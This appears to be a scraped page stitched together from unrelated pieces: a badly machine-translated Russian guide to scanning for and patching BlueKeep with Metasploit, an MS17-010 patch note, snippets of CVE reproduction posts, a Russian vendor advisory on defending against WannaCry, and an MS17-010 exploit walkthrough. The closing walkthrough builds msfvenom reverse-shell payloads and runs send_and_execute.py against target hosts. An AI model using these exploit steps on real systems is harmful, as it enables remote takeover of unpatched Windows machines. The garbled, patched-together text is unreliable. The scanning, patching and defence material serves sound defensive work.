Введение
CVE-2019-0708 Bluekeep уязвимость удаленного выполнения кода для Windows Remote Desktop Services, которая не поглощается CVE-2017-0143 EternalBlue, который влияет на некоторые старые версии систем Windows. Эта уязвимость предварительная аутентификация без взаимодействия с пользователем. Вы можете выполнить произвольные команды на целевой системе, когда вы на самом деле не проверку подлинности злоумышленника с помощью RDP (Common Port 3389) и отправить специальный запрос. Даже распространение вредоносных червей, заражение других машин в сети. Вредоносное программное обеспечение, как уменьшить Wannacry в 2017 году.
Система уязвимости
- Windows 7
- Windows Server 2008 R2
- Windows Server 2008
- Windows 2003
- Windows XP
Сканирование локальной сети
Открыть Metasploit
msfconsole
Используйте модуль сканирования
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
Если у вас нет этого модуля, пожалуйста, Metasploit обновления до последней версии
msfupdate
После того, как диапазон сканирования хоста
set RHOSTS 192.168.18.1/24
Начните сканирование
exploit
Если
[+] 192.168.1.2:3389 - The target is vulnerable.
Объясните, что это хозяин является уязвимость
Пластырь
Я нашел Windows 2003 в локальной сети с этой уязвимостью, первым скачать патч, в следующем URL.
https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708
Это только после завершения загрузки.
Перезапуск после завершения установки
Затем с помощью Metasploit пересканировать его.
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 192.168.18.27
RHOSTS => 192.168.18.27
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit
[*] 192.168.18.27:3389 - The target is not exploitable.
[*] 192.168.18.27:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) >
Копировать кодДругие системы похожи, просто отлично установки.
Другие методы профилактики
- Ломать сеть
- Служба подключения к удаленному рабочему столу Закрыть
Другое родственное
Объявление безопасности Alibaba Облако
https://help.aliyun.com/noticelist/articleid/1060000116.html?spm=a2c4g.789213612.n2.6.46be6141nusN1i
Объявление уязвимости от Microsoft
https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/
Безопасность Руководство по обновлению Microsoft,
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
Microsoft отказалась от патча поддерживается обновление системы (например, Windows XP)
https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708
О нагрузке атаки
К сожалению, я не нашел еще, в противном случае это удовольствие.
Добро пожаловать в блог bboysoulwww.bboysoul.com
Have Fun
WIN 2008 R2 CVE-2017-0143 CVE-2017-0144 CVE-2017-0145 CVE-2017-0146 CVE-2017-0147 CVE-2017-0148 processing method
tags: Safety CVE-2017-0143 CVE-2017-0144 CVE-2017-0145 CVE-2017-0146 CVE-2017-0147
Software environment
Windows 2008 R2 SP1
2. Vulnerability
CVE-2017-0143 CVE-2017-0144 CVE-2017-0145 CVE-2017-0146 CVE-2017-0147 CVE-2017-0148
3. Patch package download
windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu
Requires the classmates of the packet, the comment area is left, and private letter is sent.
4. Installation
After the package is downloaded, upload to the target server. Double-click the installation and restart the host after the installation is complete.
5. Check the update result
Control panel (view to choose large icons) -Windows Update- View update history
Image is only example
Intelligent Recommendation
CVE-2017-11882 use
Msf kail use of attack, First open kali, view IP, you can see my virtual machine kali’s IP is 192.168.3.116. Command43b_CVE-2017-11882.py download the desktop can be put kali. Then it is imperative PS…
CVE-2017-11882 exploits
CVE-2017-11882 office is remote code execution vulnerability for the office memory corruption vulnerability affecting the popular office version. Experimental environment: Kali + Win7 + office2013 The…
CVE-2017-12149 reproducibility
Vulnerability name: JBOOS AS 6.X deserialization vulnerability CVE number:CVE-2017-12149 Vulnerability Level: High risk Affects Version: 5.x and 6.x versions Vulnerability Description and principle: A…
CVE-2017-11882 Recurrence
Target machine: win7 office2013 (192.168.72.129) Attack aircraft: kali (192.168.72.139) Using script tools:https://github.com/starnightcyber/CVE-2017-11882 Reproduce 0x01: Use the tools mentioned abov…
More Recommendation
CVE-2017-8759 Reappear
Cause of vulnerability: Recently, the analysis team of the 360 Group’s core security business department discovered a new type of advanced threat attack on Office documents. The attack used the .NET…
Reproduction of CVE-2017-16995
CVE-2017-16995 0x01 Overview: The vulnerability exists in the eBPF bpf(2) system call included in the Linux kernel. When a user provides a malicious BPF program, the eBPF validator module generates a …
WebLogic(CVE-2017-10271)
Introduction Weblogic is an application server launched by Oracle. Because of its support for EJB, JSP, JMS, XML and other languages, scalability, rapid development and other features, it is favored b…
CVE-2017-14849 recurrence
CVE-2017-14849 recurrence cve description Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to “…” handling was incompatible with the p…
CVE-2017-15715 recurrence
0x00 Preface Loopholes should be reproduced again Impact version 2.4.0~2.4.29 0x01 Recurrence process 1. Environment configuration referencehttps://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-…
Данная статья подготовлена в связи в хакерской атакой массового характера в мировом масштабе, которая может коснуться и вас. Последствия становятся действительно серьезными. Ниже вы найдете краткое описание проблемы и описание основных мер, которые необходимо предпринять для защиты от вируса-шифровальщика семейства WannaCry.
Вирус-шифровальщик WannaCry использует уязвимость Microsoft Windows MS17-010, чтобы выполнить вредоносный код и запустить программу-шифровальщик на уязвимых ПК, затем вирус предлагает заплатить злоумышленникам порядка 300$, чтобы осуществить расшифровку данных. Вирус широко распространился в мировых масштабах, получив активное освещение в СМИ – Фонтанка.ру, Газета.ру, РБК.
Данной уязвимости подвержены ПК с установленными ОС Windows начиная с XP и до Windows 10 и Server 2016, официальную информацию об уязвимости от Microsoft вы можете прочитать здесь и здесь.
Эта уязвимость относится к классу Remote code execution, что означает, что заражение может быть произведено с уже зараженного ПК через сеть с низким уровнем безопасности без сегментирования МЭ — локальные сети, публичные сети, гостевые сети, а также путем запуска вредоноса полученного по почте или в виде ссылки.
Меры безопасности
Какие меры необходимо выделить как эффективные, для борьбы с данным вирусом:
- Убедитесь, что у вас установлены актуальные обновления Microsoft Windows, которые убирают уязвимость MS17-010. Найти ссылки на обновления вы можете здесь, а также обратите внимание, что в связи с беспрецедентной серьезностью данной уязвимости — 13-го мая были выпущены обновления для неподдерживаемых ОС (windowsXP, 2003 server, 2008 server) их вы можете скачать здесь.
- Используя решения по обеспечению сетевой безопасности класса IPS, убедитесь, что у вас установлены обновления, включающие выявление и компенсацию сетевой уязвимости. В базе знаний Check Point данная уязвимость описана здесь, она входит в обновление IPS от 14 марта 2017 года Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0143). Также рекомендуем настроить проверку внутреннего трафика ключевых сетевых сегментов с помощью IPS, хотя бы на короткое время, пока вероятность заражения не снизится.
- В связи с вероятностью изменения кода вируса, рекомендуем активировать системы AntiBot&Antivirus и эмуляции запуска файлов, приходящих из внешних источников по почте или сети интернет. Если вы являетесь пользователями шлюзов безопасности Check Point, то данной системой является Threat Emulation. Специально для компаний, не имеющих данной подписки, мы предлагаем быстро оформить её в триальный период 30 дней. Для того чтобы запросить ключ активирующий полнофункциональную подписку для вашего шлюза Check Point — напишите на почту SOS@TSSOLUTION.RU Подробнее про системы эмуляции файлов вы можете посмотреть здесь.
Также заблокируйте передачу парольных архивов и активируйте сигнатуры IPS из списка:
Microsoft Windows EternalBlue SMB Remote Code Execution
Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0143)
Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0144)
Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0145)
Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0146)
Microsoft Windows SMB Information Disclosure (MS17-010: CVE-2017-0147)
Еще больше рекомендаций и пример отчета о блокировке работы шифровальщика wannacry тут.
Уважаемые коллеги, основываясь на опыте работы с предыдущими массированными атаками, такими как Heart Bleed, уязвимость Microsoft Windows MS17-010 будет активно эксплуатировать на протяжении ближайших 30-40 дней, не откладывайте меры противодействия! На всякий случай, проверьте работу вашей BackUp системы.
Риск действительно большой!
UPD. В четверг, 18 мая, в 10.00 по Московскому времени, мы приглашаем вас на вебинар о вымогательском программном обеспечении и способах защиты.
Вебинар проводит компания TS Solution и Сергей Невструев, Check Point Threat Prevention Sales Manager Eastern Europe.
Мы затронем следующие вопросы:
- Атака #WannaCry
- Масштаб и текущее состояние
- Особенности
- Факторы массовости
Рекомендации по безопасности
Как быть на шаг впереди и спать спокойно
- IPS + AM
- SandBlast: Threat Emulation и Threat Extraction
- SandBlast Agent: Anti-Ransomware
- SandBlast Agent: Forensics
- SandBlast Agent: Anti-Bot
Зарегистрировать можно, ответив на это письмо, либо пройдя по ссылке на регистрацию здесь.
Только зарегистрированные пользователи могут участвовать в опросе. Войдите, пожалуйста.
Столкнулись ли вы уже с шифровальщиком WannaCry?
4.89%
столкнулся с другим шифровальщиком
43
1.37%
столкнулся, но действующая системы защиты отработала хорошо
12
Проголосовали 879 пользователей.
Воздержались 186 пользователей.
MS17-010
🖥️ -c1ph3rm4st3r-
#️⃣ CVE-2017-0143
#️⃣ Tested on Kali 2022-10-10
Method 1
git clone https://github.com/c1ph3rm4st3r/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143/
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f exe -o ms17-010.exe
create a nc listner
exploit
python2.7 send_and_execute.py 10.129.163.162 ms17-010.exe
Incase if you get a error like this folow these steps:
cd MS17-010_CVE-2017-0143/
sudo python2.7 get-pip.py
pip2.7 install --upgrade setuptools
python2.7 -m pip install impacket
Now we can run the exploit :
Method 2
Now this exploit is created in python2 and it require some libraries like impacket , pycrypto . For that virtual environment has to setup and here virtualenv program help .Once you created the environment then you can activate that environment using source utility program . Here python2 is used as interpreter because in latest Kali python3 is set as global interpreter and our exploit is in python2 .
why we use virtual environment ? For that you can check out this .
https://www.dabapps.com/blog/introduction-to-pip-and-virtualenv-python/
virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto
python checker.py 10.10.10.4
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4445 -f exe > shell.exe
python send_and_execute.py 10.10.10.4 shell.exe 445 browser
